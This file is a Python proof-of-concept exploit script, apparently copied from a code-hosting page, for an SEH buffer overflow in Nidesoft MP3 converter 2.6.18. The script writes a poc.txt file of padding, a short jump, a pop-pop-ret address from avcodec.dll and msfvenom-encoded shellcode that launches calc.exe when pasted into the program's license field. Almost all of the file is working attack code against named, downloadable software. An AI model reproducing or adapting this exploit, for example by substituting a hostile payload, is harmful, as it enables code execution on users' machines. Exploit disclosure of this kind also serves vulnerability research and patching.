67 lines
No EOL
3.3 KiB
Python
Executable file
67 lines
No EOL
3.3 KiB
Python
Executable file
#!python
|
|
#####################################################################################
|
|
# Exploit title: MP3 converter v 2.6.18 License code SEH exploit
|
|
# Date: 2016-12-15
|
|
# Vendor homepage: http://www.nidesoft.com/mp3-converter.html
|
|
# Download: http://www.nidesoft.com/downloads/mp3-converter.exe
|
|
# Tested on: Win7 SP1
|
|
# Author: malwrforensics
|
|
# Details: Launch program and enter the license code in the "Register" window
|
|
# Copy&Paste the "license" from poc.txt
|
|
#####################################################################################
|
|
|
|
def write_poc(fname, buffer):
|
|
fhandle = open(fname , 'wb')
|
|
fhandle.write(buffer)
|
|
fhandle.close()
|
|
|
|
fname="poc.txt"
|
|
buf = '\x41' * 0x176c
|
|
|
|
###################################
|
|
#msfvenom --payload windows/exec
|
|
#cmd=calc.exe --platform windows
|
|
#-f python -e x86/alpha_mixed
|
|
##################################
|
|
shellcode = ""
|
|
shellcode += "\x89\xe0\xda\xdc\xd9\x70\xf4\x59\x49\x49\x49\x49\x49"
|
|
shellcode += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
|
|
shellcode += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
|
|
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
|
|
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x58\x68\x4d\x52"
|
|
shellcode += "\x37\x70\x63\x30\x33\x30\x75\x30\x4b\x39\x59\x75\x45"
|
|
shellcode += "\x61\x79\x50\x70\x64\x4c\x4b\x42\x70\x36\x50\x4c\x4b"
|
|
shellcode += "\x42\x72\x66\x6c\x6e\x6b\x66\x32\x66\x74\x6c\x4b\x74"
|
|
shellcode += "\x32\x37\x58\x34\x4f\x4d\x67\x61\x5a\x45\x76\x75\x61"
|
|
shellcode += "\x69\x6f\x4e\x4c\x77\x4c\x43\x51\x63\x4c\x54\x42\x66"
|
|
shellcode += "\x4c\x75\x70\x39\x51\x48\x4f\x46\x6d\x67\x71\x4b\x77"
|
|
shellcode += "\x7a\x42\x48\x72\x63\x62\x30\x57\x6e\x6b\x51\x42\x74"
|
|
shellcode += "\x50\x4c\x4b\x61\x5a\x77\x4c\x6c\x4b\x52\x6c\x57\x61"
|
|
shellcode += "\x62\x58\x7a\x43\x53\x78\x45\x51\x68\x51\x43\x61\x4c"
|
|
shellcode += "\x4b\x72\x79\x55\x70\x56\x61\x38\x53\x4e\x6b\x67\x39"
|
|
shellcode += "\x46\x78\x5a\x43\x65\x6a\x37\x39\x4c\x4b\x36\x54\x6e"
|
|
shellcode += "\x6b\x57\x71\x7a\x76\x44\x71\x49\x6f\x6e\x4c\x6f\x31"
|
|
shellcode += "\x58\x4f\x36\x6d\x56\x61\x48\x47\x66\x58\x39\x70\x73"
|
|
shellcode += "\x45\x69\x66\x66\x63\x53\x4d\x5a\x58\x47\x4b\x53\x4d"
|
|
shellcode += "\x65\x74\x34\x35\x6d\x34\x70\x58\x6c\x4b\x61\x48\x35"
|
|
shellcode += "\x74\x53\x31\x69\x43\x65\x36\x4e\x6b\x74\x4c\x30\x4b"
|
|
shellcode += "\x4c\x4b\x46\x38\x67\x6c\x35\x51\x48\x53\x6e\x6b\x35"
|
|
shellcode += "\x54\x6e\x6b\x65\x51\x7a\x70\x4f\x79\x37\x34\x45\x74"
|
|
shellcode += "\x75\x74\x43\x6b\x33\x6b\x33\x51\x73\x69\x51\x4a\x36"
|
|
shellcode += "\x31\x6b\x4f\x39\x70\x51\x4f\x43\x6f\x73\x6a\x6e\x6b"
|
|
shellcode += "\x54\x52\x6a\x4b\x4e\x6d\x53\x6d\x51\x7a\x77\x71\x4c"
|
|
shellcode += "\x4d\x6c\x45\x4e\x52\x53\x30\x47\x70\x75\x50\x52\x70"
|
|
shellcode += "\x45\x38\x54\x71\x4e\x6b\x70\x6f\x6e\x67\x39\x6f\x58"
|
|
shellcode += "\x55\x4d\x6b\x4a\x50\x78\x35\x4d\x72\x36\x36\x43\x58"
|
|
shellcode += "\x79\x36\x7a\x35\x6f\x4d\x4d\x4d\x4b\x4f\x79\x45\x37"
|
|
shellcode += "\x4c\x77\x76\x51\x6c\x75\x5a\x6b\x30\x79\x6b\x49\x70"
|
|
shellcode += "\x62\x55\x37\x75\x6d\x6b\x61\x57\x35\x43\x74\x32\x52"
|
|
shellcode += "\x4f\x30\x6a\x55\x50\x31\x43\x4b\x4f\x69\x45\x32\x43"
|
|
shellcode += "\x43\x51\x32\x4c\x50\x63\x34\x6e\x61\x75\x62\x58\x50"
|
|
shellcode += "\x65\x67\x70\x41\x41"
|
|
|
|
junk = '\x41' * 0x1e
|
|
jmp = '\xeb\x20\x41\x41'
|
|
nseh = '\x37\x27\x78\x66' #pop pop ret -> avcodec.dll
|
|
buffer = buf + jmp + nseh + junk + shellcode
|
|
write_poc(fname, buffer) |